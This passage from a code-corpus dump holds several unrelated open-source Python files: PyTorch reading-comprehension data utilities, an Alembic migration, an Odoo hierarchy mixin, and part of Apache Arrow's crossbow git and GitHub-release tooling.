texts\n labels_vocab (MyVocabulary, optional): vocabular to convert labels to indices. If not provided, will be created based on the labels\n parag_max_len (int): maximum length of the paragraph. Texts shorter than parag_max_len will be cut at the end\n q_and_a_max_len (int): maximum length of the q_and_a(question and answers combination). Texts shorter than q_and_a_max_len will be cut at the end\n lowercase (bool, optional): a fag specifying whether or not the input text should be lowercased\n \"\"\"\n\n self.parag_max_len = parag_max_len\n self.q_and_a_max_len = q_and_a_max_len\n self.lowercase = lowercase\n\n self.parag = [self._pad(parag,is_parag=True) for parag,q_and_a in texts]\n self.q_and_a = [self._pad(q_and_a,is_parag=False) for parag,q_and_a in texts]\n self.labels = labels\n\n if vocab is None:\n vocab = Vocabulary(['', '', '', '<0>', '<1>', '<2>', '<3>'])\n vocab.add_tokens(itertools.chain.from_iterable(self.parag))\n vocab.add_tokens(itertools.chain.from_iterable(self.q_and_a))\n\n if labels_vocab is None:\n labels_vocab = Vocabulary()\n labels_vocab.add_tokens(self.labels)\n\n self.vocab = vocab\n self.labels_vocab = labels_vocab\n\n def _pad(self, tokens, is_parag=True):\n \"\"\"\n Pad tokens to self.max_len\n Args:\n tokens (list): a list of str tokens for a given example\n\n Returns:\n list: a padded list of str tokens for a given example\n \"\"\"\n # pad the list of tokens to be exactly of the `max_len` size\n ### YOUR CODE BELOW ###\n if is_parag:\n max_len = self.parag_max_len\n else:\n max_len = self.q_and_a_max_len\n if len(tokens) >= max_len:\n tokens = tokens[:max_len]\n else:\n pad_num = max_len - len(tokens)\n tokens = tokens + pad_num * ['']\n ### YOUR CODE ABOVE ###\n return tokens\n\n def __getitem__(self, idx):\n \"\"\"\n Given an index, return a indexed dataset example\n\n Args:\n idx (int): dataset index\n\n Returns:\n tuple: a tuple of token_ids based on the vocabulary mapping and a corresponding label\n \"\"\"\n ### YOUR CODE BELOW ###\n parag, q_and_a = self.parag[idx], self.q_and_a[idx]\n parag_tokens = np.array([self.vocab[token] if token in self.vocab else self.vocab[''] for token in parag],\n dtype=np.int64)\n q_and_a_tokens = np.array([self.vocab[token] if token in self.vocab else self.vocab[''] for token in q_and_a],\n dtype=np.int64)\n label = self.labels[idx]\n label = self.labels_vocab[label]\n ### YOUR CODE ABOVE ###\n return parag_tokens, q_and_a_tokens, label\n\n def __len__(self):\n return len(self.parag)\n\n\ndef 
masked_softmax(logits, mask, dim=-1, log_softmax=False):\n \"\"\"Take the softmax of `logits` over given dimension, and set\n entries to 0 wherever `mask` is 0.\n Args:\n logits (torch.Tensor): Inputs to the softmax function.\n mask (torch.Tensor): Same shape as `logits`, with 0 indicating\n positions that should be assigned 0 probability in the output.\n dim (int): Dimension over which to take softmax.\n log_softmax (bool): Take log-softmax rather than regular softmax.\n E.g., some PyTorch functions such as `F.nll_loss` expect log-softmax.\n Returns:\n probs (torch.Tensor): Result of taking masked softmax over the logits.\n \"\"\"\n mask = mask.type(torch.float32)\n masked_logits = mask * logits + (1 - mask) * -1e30\n softmax_fn = F.log_softmax if log_softmax else F.softmax\n probs = softmax_fn(masked_logits, dim)\n\n return probs\n\ndef torch_from_json(path, dtype=torch.float32):\n \"\"\"Load a PyTorch Tensor from a JSON file.\n Args:\n path (str): Path to the JSON file to load.\n dtype (torch.dtype): Data type of loaded array.\n Returns:\n tensor (torch.Tensor): Tensor loaded from JSON file.\n \"\"\"\n with open(path, 'r',encoding=\"utf8\") as fh:\n array = np.array(json.load(fh))\n\n tensor = torch.from_numpy(array).type(dtype)\n\n return tensor\n\n\ndef get_dataset_quail():\n \"\"\"\n The structure of quAIL training dataset:\n\n {'version': ,\n 'data':\n 'u001':\n 'author': \n 'title': \n 'context': \n 'questions':\n 'u001_0':\n 'question': \n 'answers':\n '0': \n '1': \n '2': \n '3': }\n \"\"\"\n train_processed_data_file_name = 'train_processed_data.txt'\n dev_processed_data_file_name = 'dev_processed_data.txt'\n\n # create stitched data if they do not exist.\n f_list = os.listdir()\n if train_processed_data_file_name not in f_list:\n questions_file_name = './data/quAIL/train_questions.json'\n key_file_name = './data/quAIL/train_key.json'\n process_data_quail(questions_file_name, key_file_name, train_processed_data_file_name)\n if dev_processed_data_file_name not in f_list:\n questions_file_name = './data/quAIL/dev_questions.json'\n key_file_name = './data/quAIL/new_dev_key.json'\n process_data_quail(questions_file_name, key_file_name, dev_processed_data_file_name)\n\n # load stitched data\n with open(train_processed_data_file_name, 'rb') as f:\n train_data = pickle.load(f)\n with open(dev_processed_data_file_name, 'rb') as f:\n dev_data = pickle.load(f)\n\n parag_length_list = [len(example[0]) for example, label in train_data]\n max_parag_length = max(parag_length_list)\n q_and_a_length_list = [len(example[1]) for example, label in train_data]\n max_q_and_a_length = max(q_and_a_length_list)\n print(\"guagua\", max_parag_length, max_q_and_a_length)\n\n train_texts = [example for example, label in train_data]\n train_labels = [label for quiz, label in train_data]\n dev_texts = [quiz for quiz, label in dev_data]\n dev_labels = [label for quiz, label in dev_data]\n\n # build standard Pytorch Dataset object of our data\n dataset_train = QADataset(train_texts, train_labels, parag_max_len=max_parag_length,\n q_and_a_max_len=max_q_and_a_length)\n dataset_dev = QADataset(dev_texts, dev_labels, vocab=dataset_train.vocab, labels_vocab=dataset_train.labels_vocab,\n parag_max_len=max_parag_length, q_and_a_max_len=max_q_and_a_length)\n\n return dataset_train, dataset_dev\n\ndef get_dataset_race():\n train_path = './data/RACE/train/'\n dev_path = './data/RACE/dev/'\n train_processed_data_file_name = 'train_processed_data_race.txt'\n dev_processed_data_file_name = 'dev_processed_data_race.txt'\n 
f_list = os.listdir()\n if train_processed_data_file_name not in f_list:\n process_data_race(train_path, train_processed_data_file_name)\n if dev_processed_data_file_name not in f_list:\n process_data_race(dev_path, dev_processed_data_file_name)\n # load stitched data\n with open(train_processed_data_file_name, 'rb') as f:\n train_data = pickle.load(f)\n with open(dev_processed_data_file_name, 'rb') as f:\n dev_data = pickle.load(f)\n parag_length_list = [len(example[0]) for example, label in train_data]\n max_parag_length = max(parag_length_list)\n q_and_a_length_list = [len(example[1]) for example, label in train_data]\n max_q_and_a_length = max(q_and_a_length_list)\n print(\"guagua\",max_parag_length,max_q_and_a_length)\n\n train_texts = [example for example, label in train_data]\n train_labels = [label for quiz, label in train_data]\n dev_texts = [quiz for quiz, label in dev_data]\n dev_labels = [label for quiz, label in dev_data]\n\n # build standard Pytorch Dataset object of our data\n dataset_train = QADataset(train_texts, train_labels, parag_max_len=max_parag_length,\n q_and_a_max_len=max_q_and_a_length)\n dataset_dev = QADataset(dev_texts, dev_labels, vocab=dataset_train.vocab, labels_vocab=dataset_train.labels_vocab,\n parag_max_len=max_parag_length, q_and_a_max_len=max_q_and_a_length)\n return dataset_train, dataset_dev\n\ndef get_dataset_race_and_quail():\n # this function is used for data augmentation\n train_processed_data_file_name_race = 'train_processed_data_race.txt'\n f_list = os.listdir()\n with open(train_processed_data_file_name_race, 'rb') as f:\n train_data_race = pickle.load(f)\n\n train_processed_data_file_name_quail = 'train_processed_data.txt'\n f_list = os.listdir()\n with open(train_processed_data_file_name_quail, 'rb') as f:\n train_data_quail = pickle.load(f)\n\n dev_processed_data_file_name_quail = 'dev_processed_data.txt'\n with open(dev_processed_data_file_name_quail, 'rb') as f:\n dev_data_quail = pickle.load(f)\n\n parag_length_list = [len(example[0]) for example, label in train_data_race]\n max_parag_length_race = max(parag_length_list)\n parag_length_list = [len(example[0]) for example, label in train_data_quail]\n max_parag_length_quail = max(parag_length_list)\n max_parag_length = max(max_parag_length_race, max_parag_length_quail)\n\n q_and_a_length_list_race = [len(example[1]) for example, label in train_data_race]\n max_q_and_a_length_race = max(q_and_a_length_list_race)\n q_and_a_length_list_quail = [len(example[1]) for example, label in train_data_quail]\n max_q_and_a_length_quail = max(q_and_a_length_list_quail)\n max_q_and_a_length = max(max_q_and_a_length_race, max_q_and_a_length_quail)\n\n print(\"max paragraph length and max q_and_a length: \",max_parag_length,max_q_and_a_length)\n\n train_texts = [example for example, label in train_data_race] + [example for example, label in train_data_quail]\n train_labels = [label for quiz, label in train_data_race] + [label for quiz, label in train_data_quail]\n dev_texts = [quiz for quiz, label in dev_data_quail]\n dev_labels = [label for quiz, label in dev_data_quail]\n\n # build standard Pytorch Dataset object of our data\n dataset_train = QADataset(train_texts, train_labels, parag_max_len=max_parag_length,\n q_and_a_max_len=max_q_and_a_length)\n dataset_dev = QADataset(dev_texts, dev_labels, vocab=dataset_train.vocab, labels_vocab=dataset_train.labels_vocab,\n parag_max_len=max_parag_length, q_and_a_max_len=max_q_and_a_length)\n return dataset_train, dataset_dev\n\nclass EMA:\n \"\"\"Exponential 
class EMA:\n    \"\"\"Exponential moving average of model parameters.\n    Args:\n        model (torch.nn.Module): Model with parameters whose EMA will be kept.\n        decay (float): Decay rate for exponential moving average.\n    \"\"\"\n    def __init__(self, model, decay):\n        self.decay = decay\n        self.shadow = {}\n        self.original = {}\n\n        # Register model parameters\n        for name, param in model.named_parameters():\n            if param.requires_grad:\n                self.shadow[name] = param.data.clone()\n\n    def __call__(self, model, num_updates):\n        decay = min(self.decay, (1.0 + num_updates) / (10.0 + num_updates))\n        for name, param in model.named_parameters():\n            if param.requires_grad:\n                assert name in self.shadow\n                new_average = \\\n                    (1.0 - decay) * param.data + decay * self.shadow[name]\n                self.shadow[name] = new_average.clone()\n\n    def assign(self, model):\n        \"\"\"Assign exponential moving average of parameter values to the\n        respective parameters.\n        Args:\n            model (torch.nn.Module): Model to assign parameter values.\n        \"\"\"\n        for name, param in model.named_parameters():\n            if param.requires_grad:\n                assert name in self.shadow\n                self.original[name] = param.data.clone()\n                param.data = self.shadow[name]\n\n    def resume(self, model):\n        \"\"\"Restore original parameters to a model. That is, put back\n        the values that were in each parameter at the last call to `assign`.\n        Args:\n            model (torch.nn.Module): Model to assign parameter values.\n        \"\"\"\n        for name, param in model.named_parameters():\n            if param.requires_grad:\n                assert name in self.shadow\n                param.data = self.original[name]\n\n\ndef load_model(model, checkpoint_path, device, return_step=True):\n    \"\"\"Load model parameters from disk.\n    Args:\n        model (torch.nn.DataParallel): Load parameters into this model.\n        checkpoint_path (str): Path to checkpoint to load.\n        device (torch.device or str): Device to map the loaded checkpoint onto.\n        return_step (bool): Also return the step at which checkpoint was saved.\n    Returns:\n        model (torch.nn.DataParallel): Model loaded from checkpoint.\n        step (int): Step at which checkpoint was saved. Only if `return_step`.\n    \"\"\"\n    ckpt_dict = torch.load(checkpoint_path, map_location=device)\n\n    # Build model, load parameters\n    model.load_state_dict(ckpt_dict)\n\n    # if return_step:\n    #     step = ckpt_dict['step']\n    #     return model, step\n\n    return model","repo_name":"Mikemraz/QAsystem-quAIL","sub_path":"utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":21420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32163208826","text":"\"\"\"empty message\n\nRevision ID: d46e7ff1b1f2\nRevises: \nCreate Date: 2021-08-04 17:33:51.191722\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd46e7ff1b1f2'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('NFL', sa.Column('team_name', sa.VARCHAR(length=30), nullable=True))\n    op.drop_column('NFL', 'name')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('NFL', sa.Column('name', sa.VARCHAR(length=30), autoincrement=False, nullable=True))\n op.drop_column('NFL', 'team_name')\n # ### end Alembic commands ###\n","repo_name":"jasole1983/yourwildestfantasy","sub_path":"xtra/migrations/versions/d46e7ff1b1f2_.py","file_name":"d46e7ff1b1f2_.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"33934304827","text":"import functools\nimport json\nimport operator\n\nfrom odoo import api, fields, models\nfrom odoo.osv import expression\n\n\nclass Hierarchy(models.AbstractModel):\n\n _name = \"muk_utils.mixins.hierarchy\"\n _description = \"Hierarchy Mixin\"\n\n _parent_store = True\n _parent_path_sudo = False\n _parent_path_store = False\n\n _name_path_context = \"show_path\"\n\n # ----------------------------------------------------------\n # Database\n # ----------------------------------------------------------\n\n parent_path = fields.Char(string=\"Parent Path\", index=True)\n parent_path_names = fields.Char(\n _module=lambda self: self._module,\n compute=\"_compute_parent_paths\",\n compute_sudo=False,\n store=lambda self: self._parent_path_store,\n search=\"_search_parent_path_names\",\n string=\"Path Names\",\n readonly=True,\n automatic=True,\n )\n parent_path_json = fields.Text(\n _module=lambda self: self._module,\n compute=\"_compute_parent_paths\",\n compute_sudo=False,\n store=lambda self: self._parent_path_store,\n string=\"Path Json\",\n readonly=True,\n automatic=True,\n )\n\n\n # ----------------------------------------------------------\n # Helper\n # ----------------------------------------------------------\n\n @api.model\n def _get_depends_parent_paths(self):\n depends = [\"parent_path\"]\n if self._rec_name:\n depends += [self._rec_name]\n elif \"name\" in self._fields:\n depends += [\"name\"]\n elif \"x_name\" in self._fields:\n depends += [\"x_name\"]\n return depends\n\n # ----------------------------------------------------------\n # Search\n # ----------------------------------------------------------\n\n @api.model\n def _search_parent_path_names(self, operator, operand):\n domain = []\n for value in operand.split(\"/\"):\n args = [(self._rec_name_fallback(), operator, value)]\n domain = expression.OR([args, domain]) if domain else args\n return domain if domain else [(self._rec_name_fallback(), operator, \"\")]\n\n # ----------------------------------------------------------\n # Read, View\n # ----------------------------------------------------------\n\n @api.depends(lambda self: self._get_depends_parent_paths())\n def _compute_parent_paths(self):\n records = self.filtered(\"parent_path\")\n records_without_parent_path = self - records\n paths = [list(map(int, rec.parent_path.split(\"/\")[:-1])) for rec in records]\n ids = paths and set(functools.reduce(operator.concat, paths)) or []\n model_without_path = self.with_context(**{self._name_path_context: False})\n filtered_records = model_without_path.browse(ids)._filter_access(\"read\")\n data = dict(filtered_records.name_get())\n for record in records:\n path_names = [\"\"]\n path_json = []\n for id in reversed(list(map(int, record.parent_path.split(\"/\")[:-1]))):\n if id not in data:\n break\n path_names.append(data[id])\n path_json.append({\"model\": record._name, \"name\": data[id], \"id\": id})\n path_names.reverse()\n path_json.reverse()\n record.update(\n {\n \"parent_path_names\": \"/\".join(path_names),\n \"parent_path_json\": 
json.dumps(path_json),\n                }\n            )\n        records_without_parent_path.update(\n            {\"parent_path_names\": False, \"parent_path_json\": False}\n        )\n\n    @api.model\n    def _name_search(\n        self, name=\"\", args=None, operator=\"ilike\", limit=100, name_get_uid=None\n    ):\n        domain = list(args or [])\n        if not (name == \"\" and operator == \"ilike\"):\n            if \"/\" in name:\n                domain += [(\"parent_path_names\", operator, name)]\n            else:\n                domain += [(self._rec_name, operator, name)]\n        records = self.browse(\n            self._search(domain, limit=limit, access_rights_uid=name_get_uid)\n        )\n        return models.lazy_name_get(records.with_user(name_get_uid or self.env.uid))\n\n    def name_get(self):\n        if self.env.context.get(self._name_path_context):\n            res = []\n            for record in self:\n                names = record.parent_path_names\n                if not names:\n                    res.append(super(Hierarchy, record).name_get()[0])\n                elif not len(names) > 50:\n                    res.append((record.id, names))\n                else:\n                    res.append((record.id, \"..\" + names[-48:]))\n            return res\n        return super(Hierarchy, self).name_get()\n\n    # ----------------------------------------------------------\n    # Create, Update, Delete\n    # ----------------------------------------------------------\n\n    def write(self, vals):\n        res = super(Hierarchy, self).write(vals)\n        if self._parent_path_store and self._rec_name_fallback() in vals:\n            domain = [(\"id\", \"child_of\", self.ids)]\n            records = self.sudo().search(domain)\n            records.modified([\"parent_path\"])\n        return res\n\n","repo_name":"PricePaper/odoo-custom-v15","sub_path":"muk_utils/models/mixins_hierarchy.py","file_name":"mixins_hierarchy.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"12377330857","text":"import os\nimport re\nimport fnmatch\nimport glob\nimport time\nimport logging\nimport mimetypes\nimport subprocess\nimport textwrap\nimport uuid\nfrom io import StringIO\nfrom pathlib import Path\nfrom datetime import date\nimport warnings\n\nimport jinja2\nfrom ruamel.yaml import YAML\n\ntry:\n    import github3\n    _have_github3 = True\nexcept ImportError:\n    github3 = object\n    _have_github3 = False\n\ntry:\n    import pygit2\nexcept ImportError:\n    PygitRemoteCallbacks = object\n    GitError = Exception\nelse:\n    PygitRemoteCallbacks = pygit2.RemoteCallbacks\n    GitError = pygit2.GitError\n\nfrom ..utils.source import ArrowSources\n\n\nfor pkg in [\"requests\", \"urllib3\", \"github3\"]:\n    logging.getLogger(pkg).setLevel(logging.WARNING)\n\nlogger = logging.getLogger(\"crossbow\")\n\n\nclass CrossbowError(Exception):\n    pass\n\n\ndef _flatten(mapping):\n    \"\"\"Converts a hierarchical mapping to a flat dictionary\"\"\"\n    result = {}\n    for k, v in mapping.items():\n        if isinstance(v, dict):\n            for ik, iv in _flatten(v).items():\n                ik = ik if isinstance(ik, tuple) else (ik,)\n                result[(k,) + ik] = iv\n        elif isinstance(v, list):\n            for ik, iv in enumerate(_flatten(v)):\n                ik = ik if isinstance(ik, tuple) else (ik,)\n                result[(k,) + ik] = iv\n        else:\n            result[(k,)] = v\n    return result\n\n\ndef _unflatten(mapping):\n    \"\"\"Converts a flat tuple => object mapping to hierarchical one\"\"\"\n    result = {}\n    for path, value in mapping.items():\n        parents, leaf = path[:-1], path[-1]\n        # create the hierarchy until we reach the leaf value\n        temp = result\n        for parent in parents:\n            temp.setdefault(parent, {})\n            temp = temp[parent]\n        # set the leaf value\n        temp[leaf] = value\n\n    return result\n\n\ndef _unflatten_tree(files):\n    \"\"\"Converts a flat path => object mapping to a hierarchy of directories\n\n    
Input:\n    {\n        'path/to/file.a': a_content,\n        'path/to/file.b': b_content,\n        'path/file.c': c_content\n    }\n    Output:\n    {\n        'path': {\n            'to': {\n                'file.a': a_content,\n                'file.b': b_content\n            },\n            'file.c': c_content\n        }\n    }\n    \"\"\"\n    files = {tuple(k.split('/')): v for k, v in files.items()}\n    return _unflatten(files)\n\n\ndef _render_jinja_template(searchpath, template, params):\n    def format_all(items, pattern):\n        return [pattern.format(item) for item in items]\n\n    loader = jinja2.FileSystemLoader(searchpath)\n    env = jinja2.Environment(loader=loader, trim_blocks=True,\n                             lstrip_blocks=True,\n                             undefined=jinja2.StrictUndefined)\n    env.filters['format_all'] = format_all\n    template = env.get_template(template)\n    return template.render(**params)\n\n\n# configurations for setting up branch skipping\n# - appveyor has a feature to skip builds without an appveyor.yml\n# - travis reads from the default branch and applies the rules\n# - circle requires the configuration to be present on all branches, even ones\n#   that are configured to be skipped\n# - azure skips branches without azure-pipelines.yml by default\n# - github skips branches without .github/workflows/ by default\n\n_default_travis_yml = \"\"\"\nbranches:\n  only:\n    - master\n    - /.*-travis-.*/\n\nos: linux\ndist: trusty\nlanguage: generic\n\"\"\"\n\n_default_circle_yml = \"\"\"\nversion: 2\n\njobs:\n  build:\n    machine: true\n\nworkflows:\n  version: 2\n  build:\n    jobs:\n      - build:\n          filters:\n            branches:\n              only:\n                - /.*-circle-.*/\n\"\"\"\n\n_default_tree = {\n    '.travis.yml': _default_travis_yml,\n    '.circleci/config.yml': _default_circle_yml\n}\n\n\nclass GitRemoteCallbacks(PygitRemoteCallbacks):\n\n    def __init__(self, token):\n        self.token = token\n        self.attempts = 0\n        super().__init__()\n\n    def push_update_reference(self, refname, message):\n        pass\n\n    def update_tips(self, refname, old, new):\n        pass\n\n    def credentials(self, url, username_from_url, allowed_types):\n        # it's a libgit2 bug that it infinitely retries the authentication\n        self.attempts += 1\n\n        if self.attempts >= 5:\n            # pygit2 doesn't propagate the exception properly\n            msg = 'Wrong oauth personal access token'\n            print(msg)\n            raise CrossbowError(msg)\n\n        if (allowed_types &\n                pygit2.credentials.GIT_CREDENTIAL_USERPASS_PLAINTEXT):\n            return pygit2.UserPass('x-oauth-basic', self.token)\n        else:\n            return None\n\n\ndef _git_ssh_to_https(url):\n    return url.replace('git@github.com:', 'https://github.com/')\n\n\ndef _parse_github_user_repo(remote_url):\n    # TODO: use a proper URL parser instead?\n    m = re.match(r'.*\\/([^\\/]+)\\/([^\\/\\.]+)(\\.git|/)?$', remote_url)\n    if m is None:\n        # Perhaps it's simply \"username/reponame\"?\n        m = re.match(r'^(\\w+)/(\\w+)$', remote_url)\n        if m is None:\n            raise CrossbowError(\n                f\"Unable to parse the github owner and repository from the \"\n                f\"repository's remote url {remote_url!r}\"\n            )\n    user, repo = m.group(1), m.group(2)\n    return user, repo\n\n\nclass Repo:\n    \"\"\"\n    Base class for interaction with local git repositories\n\n    A high level wrapper used for both reading revision information from\n    arrow's repository and pushing continuous integration tasks to the queue\n    repository.\n\n    Parameters\n    ----------\n    require_https : boolean, default False\n        Raise exception for SSH origin URLs\n    \"\"\"\n\n    def __init__(self, path, github_token=None, remote_url=None,\n                 require_https=False):\n        self.path = Path(path)\n        self.github_token = github_token\n        self.require_https = require_https\n        self._remote_url = remote_url\n        self._pygit_repo = None\n        self._github_repo = 
None  # set by as_github_repo()\n        self._updated_refs = []\n\n    def __str__(self):\n        tpl = textwrap.dedent('''\n            Repo: {remote}@{branch}\n            Commit: {head}\n        ''')\n        return tpl.format(\n            remote=self.remote_url,\n            branch=self.branch.branch_name,\n            head=self.head\n        )\n\n    @property\n    def repo(self):\n        if self._pygit_repo is None:\n            self._pygit_repo = pygit2.Repository(str(self.path))\n        return self._pygit_repo\n\n    @property\n    def origin(self):\n        remote = self.repo.remotes['origin']\n        if self.require_https and remote.url.startswith('git@github.com'):\n            raise CrossbowError(\"Change SSH origin URL to HTTPS to use \"\n                                \"Crossbow: {}\".format(remote.url))\n        return remote\n\n    def fetch(self, retry=3):\n        refspec = '+refs/heads/*:refs/remotes/origin/*'\n        attempt = 1\n        while True:\n            try:\n                self.origin.fetch([refspec])\n                break\n            except GitError as e:\n                if retry and attempt < retry:\n                    attempt += 1\n                else:\n                    raise e\n\n    def push(self, refs=None, github_token=None):\n        github_token = github_token or self.github_token\n        if github_token is None:\n            raise RuntimeError(\n                'Could not determine GitHub token. Please set the '\n                'CROSSBOW_GITHUB_TOKEN environment variable to a '\n                'valid GitHub access token or pass one to --github-token.'\n            )\n        callbacks = GitRemoteCallbacks(github_token)\n        refs = refs or []\n        try:\n            self.origin.push(refs + self._updated_refs, callbacks=callbacks)\n        except pygit2.GitError:\n            raise RuntimeError('Failed to push updated references, '\n                               'potentially because of credential issues: {}'\n                               .format(self._updated_refs))\n        else:\n            self._updated_refs = []\n
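\n    # Note: `_updated_refs` accumulates the references created by\n    # `create_branch()` and `create_tag()` below; a successful `push()`\n    # clears the list so the same refs are not pushed twice.\n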
\n    @property\n    def head(self):\n        \"\"\"Currently checked out commit's sha\"\"\"\n        return self.repo.head\n\n    @property\n    def branch(self):\n        \"\"\"Currently checked out branch\"\"\"\n        try:\n            return self.repo.branches[self.repo.head.shorthand]\n        except KeyError:\n            raise CrossbowError(\n                'Cannot determine the current branch of the Arrow repository '\n                'to clone or push to, perhaps it is in detached HEAD state. '\n                'Please checkout a branch.'\n            )\n\n    @property\n    def remote(self):\n        \"\"\"Currently checked out branch's remote counterpart\"\"\"\n        try:\n            return self.repo.remotes[self.branch.upstream.remote_name]\n        except (AttributeError, KeyError):\n            raise CrossbowError(\n                'Cannot determine git remote for the Arrow repository to '\n                'clone or push to, try to push the `{}` branch first to have '\n                'a remote tracking counterpart.'.format(self.branch.name)\n            )\n\n    @property\n    def remote_url(self):\n        \"\"\"Currently checked out branch's remote counterpart URL\n\n        If an SSH github url is set, it will be replaced by the https\n        equivalent usable with GitHub OAuth token.\n        \"\"\"\n        return self._remote_url or _git_ssh_to_https(self.remote.url)\n\n    @property\n    def user_name(self):\n        try:\n            return next(self.repo.config.get_multivar('user.name'))\n        except StopIteration:\n            return os.environ.get('GIT_COMMITTER_NAME', 'unknown')\n\n    @property\n    def user_email(self):\n        try:\n            return next(self.repo.config.get_multivar('user.email'))\n        except StopIteration:\n            return os.environ.get('GIT_COMMITTER_EMAIL', 'unknown')\n\n    @property\n    def signature(self):\n        return pygit2.Signature(self.user_name, self.user_email,\n                                int(time.time()))\n\n    @property\n    def default_branch_name(self):\n        default_branch_name = os.getenv(\"ARCHERY_DEFAULT_BRANCH\")\n\n        if default_branch_name is None:\n            try:\n                ref_obj = self.repo.references[\"refs/remotes/origin/HEAD\"]\n                target_name = ref_obj.target\n                target_name_tokenized = target_name.split(\"/\")\n                default_branch_name = target_name_tokenized[-1]\n            except KeyError:\n                default_branch_name = \"main\"\n                warnings.warn('Unable to determine default branch name: '\n                              'ARCHERY_DEFAULT_BRANCH environment variable is '\n                              'not set. Git repository does not contain a '\n                              '\\'refs/remotes/origin/HEAD\\' reference. 
Setting '\n 'the default branch name to ' +\n default_branch_name, RuntimeWarning)\n\n return default_branch_name\n\n def create_tree(self, files):\n builder = self.repo.TreeBuilder()\n\n for filename, content in files.items():\n if isinstance(content, dict):\n # create a subtree\n tree_id = self.create_tree(content)\n builder.insert(filename, tree_id, pygit2.GIT_FILEMODE_TREE)\n else:\n # create a file\n blob_id = self.repo.create_blob(content)\n builder.insert(filename, blob_id, pygit2.GIT_FILEMODE_BLOB)\n\n tree_id = builder.write()\n return tree_id\n\n def create_commit(self, files, parents=None, message='',\n reference_name=None):\n if parents is None:\n # by default use the main branch as the base of the new branch\n # required to reuse github actions cache across crossbow tasks\n commit, _ = self.repo.resolve_refish(self.default_branch_name)\n parents = [commit.id]\n tree_id = self.create_tree(files)\n\n author = committer = self.signature\n commit_id = self.repo.create_commit(reference_name, author, committer,\n message, tree_id, parents)\n return self.repo[commit_id]\n\n def create_branch(self, branch_name, files, parents=None, message='',\n signature=None):\n # create commit with the passed tree\n commit = self.create_commit(files, parents=parents, message=message)\n\n # create branch pointing to the previously created commit\n branch = self.repo.create_branch(branch_name, commit)\n\n # append to the pushable references\n self._updated_refs.append('refs/heads/{}'.format(branch_name))\n\n return branch\n\n def create_tag(self, tag_name, commit_id, message=''):\n tag_id = self.repo.create_tag(tag_name, commit_id,\n pygit2.GIT_OBJ_COMMIT, self.signature,\n message)\n\n # append to the pushable references\n self._updated_refs.append('refs/tags/{}'.format(tag_name))\n\n return self.repo[tag_id]\n\n def file_contents(self, commit_id, file):\n commit = self.repo[commit_id]\n entry = commit.tree[file]\n blob = self.repo[entry.id]\n return blob.data\n\n def _github_login(self, github_token):\n \"\"\"Returns a logged in github3.GitHub instance\"\"\"\n if not _have_github3:\n raise ImportError('Must install github3.py')\n github_token = github_token or self.github_token\n session = github3.session.GitHubSession(\n default_connect_timeout=10,\n default_read_timeout=30\n )\n github = github3.GitHub(session=session)\n github.login(token=github_token)\n return github\n\n def as_github_repo(self, github_token=None):\n \"\"\"Converts it to a repository object which wraps the GitHub API\"\"\"\n if self._github_repo is None:\n github = self._github_login(github_token)\n username, reponame = _parse_github_user_repo(self.remote_url)\n self._github_repo = github.repository(username, reponame)\n return self._github_repo\n\n def token_expiration_date(self, github_token=None):\n \"\"\"Returns the expiration date for the github_token provided\"\"\"\n github = self._github_login(github_token)\n # github3 hides the headers from us. 
Use the _get method\n        # to access the response headers.\n        resp = github._get(github.session.base_url)\n        # Response in the form '2023-01-23 10:40:28 UTC'\n        date_string = resp.headers.get(\n            'github-authentication-token-expiration')\n        if date_string:\n            return date.fromisoformat(date_string.split()[0])\n\n    def github_commit(self, sha):\n        repo = self.as_github_repo()\n        return repo.commit(sha)\n\n    def github_release(self, tag):\n        repo = self.as_github_repo()\n        try:\n            return repo.release_from_tag(tag)\n        except github3.exceptions.NotFoundError:\n            return None\n\n    def github_upload_asset_requests(self, release, path, name, mime,\n                                     max_retries=None, retry_backoff=None):\n        if max_retries is None:\n            max_retries = int(os.environ.get('CROSSBOW_MAX_RETRIES', 8))\n        if retry_backoff is None:\n            retry_backoff = int(os.environ.get('CROSSBOW_RETRY_BACKOFF', 5))\n\n        for i in range(max_retries):\n            try:\n                with open(path, 'rb') as fp:\n                    result = release.upload_asset(name=name, asset=fp,\n                                                  content_type=mime)\n            except github3.exceptions.ResponseError as e:\n                logger.error('Attempt {} has failed with message: {}.'\n                             .format(i + 1, str(e)))\n                logger.error('Error message {}'.format(e.msg))\n                logger.error('List of errors provided by GitHub:')\n                for err in e.errors:\n                    logger.error(' - {}'.format(err))\n\n                if e.code == 422:\n                    # 422 Validation Failed, probably raised because\n                    # ReleaseAsset already exists, so try to remove it before\n                    # reattempting the asset upload\n                    for asset in release.assets():\n                        if asset.name == name:\n                            logger.info('Release asset {} already exists, '\n                                        'removing it...'.format(name))\n                            asset.delete()\n                            logger.info('Asset {} removed.'.format(name))\n                            break\n            except github3.exceptions.ConnectionError as e:\n                logger.error('Attempt {} has failed with message: {}.'\n                             .format(i + 1, str(e)))\n            else:\n                logger.info('Attempt {} has finished.'.format(i + 1))\n                return result\n\n            time.sleep(retry_backoff)\n\n        raise RuntimeError('GitHub asset uploading has failed!')\n\n    def github_upload_asset_curl(self, release, path, name, mime):\n        upload_url, _ = release.upload_url.split('{?')\n        upload_url += '?name={}'.format(name)\n\n        command = [\n            'curl',\n            '--fail',\n            '-H', \"Authorization: token {}\".format(self.github_token),\n            '-H', \"Content-Type: {}\".format(mime),\n            '--data-binary', '@{}'.format(path),\n            upload_url\n        ]\n        return subprocess.run(command, shell=False, check=True)\n\n    def github_overwrite_release_assets(self, tag_name, target_commitish,\n                                        patterns, method='requests'):\n        # Since github has changed something, the asset uploading via requests\n        # became unstable, so prefer the cURL alternative.\n        # Potential cause:\n        # sigmavirus24/github3.py/issues/779#issuecomment-379470626\n        repo = self.as_github_repo()\n        if not tag_name:\n            raise CrossbowError('Empty tag name')\n        if not target_commitish:\n            